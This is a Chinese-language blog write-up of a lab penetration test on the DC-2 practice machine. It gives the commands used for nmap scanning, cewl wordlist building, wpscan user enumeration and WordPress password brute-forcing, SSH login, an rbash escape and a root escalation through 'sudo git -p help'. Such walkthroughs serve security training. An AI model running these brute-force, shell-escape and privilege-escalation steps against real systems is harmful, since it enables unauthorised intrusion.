Write-Up - [渗透测试] DC-2靶机渗透测试

本文描述了一名渗透测试者对DC-2靶机进行的步骤,包括使用nmap探测端口,识别web和SSH服务,通过cewl字典爆破获取密码,利用wpscan和dirb扫描网站,最终通过rbash和git提权获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Author:一条’小龍龙

Team:Traceless 网络安全团队

Data:2023/10/7

Description:DC-2靶机渗透测试

step1 信息收集

ifconfig

在这里插入图片描述

nmap -T4 -sn 192.168.169.0/24 --min-rate 1000

在这里插入图片描述

靶机IP为192.168.169.132

扫描靶机端口信息

nmap -T4 -sV 192.168.169.132 -p 1-65535 --min-rate 1000

在这里插入图片描述

开放服务为webssh,端口分别为80,7744

设置host

echo 192.168.169.132 dc-2 >> /etc/hosts

在这里插入图片描述

访问web网站

在这里插入图片描述

在这里插入图片描述

flag页面给出了信息,猜测使用cewl生成字典爆破密码

cewl -w passwd.txt http://dc-2

在这里插入图片描述

在这里插入图片描述

扫描网站详细信息

wpscan --ignore-main-redirect --url 192.168.169.132 --enumerate u --force

在这里插入图片描述

在这里插入图片描述

将用户名写入文件中,后续会用到

扫描网站目录

dirb http://dc-2

在这里插入图片描述

访问http://dc-2/wp-admin/页面即可跳转至登陆页面

在这里插入图片描述

爆破密码

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

在这里插入图片描述

将获得的密码写入pass.txt文件中

在这里插入图片描述

step2 渗透测试

登录

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

经测试,网站无法利用

尝试ssh登录

ssh jreey@192.168.169.132 -p 7744
ssh tom@192.168.169.132 -p 7744

在这里插入图片描述

jerry账户登陆失败,尝试登陆tom账户成功

在这里插入图片描述

提示没有这个命令,但我们发现了rbsah。 有兴趣的朋友,可以了解下什么是rbash

尝试rbash绕过

查看环境变量

export -p

在这里插入图片描述

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

单词中看到有su tom jerry,猜测切换jerry账户

su jerry

在这里插入图片描述

提示词中有 git

查看可以使用root权限的命令

sudo -l

在这里插入图片描述

尝试git提权

sudo git -p help 

输入!/bin/bash回车

在这里插入图片描述

step3 拿到flag!请添加图片描述

在这里插入图片描述

请添加图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一条小龍龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值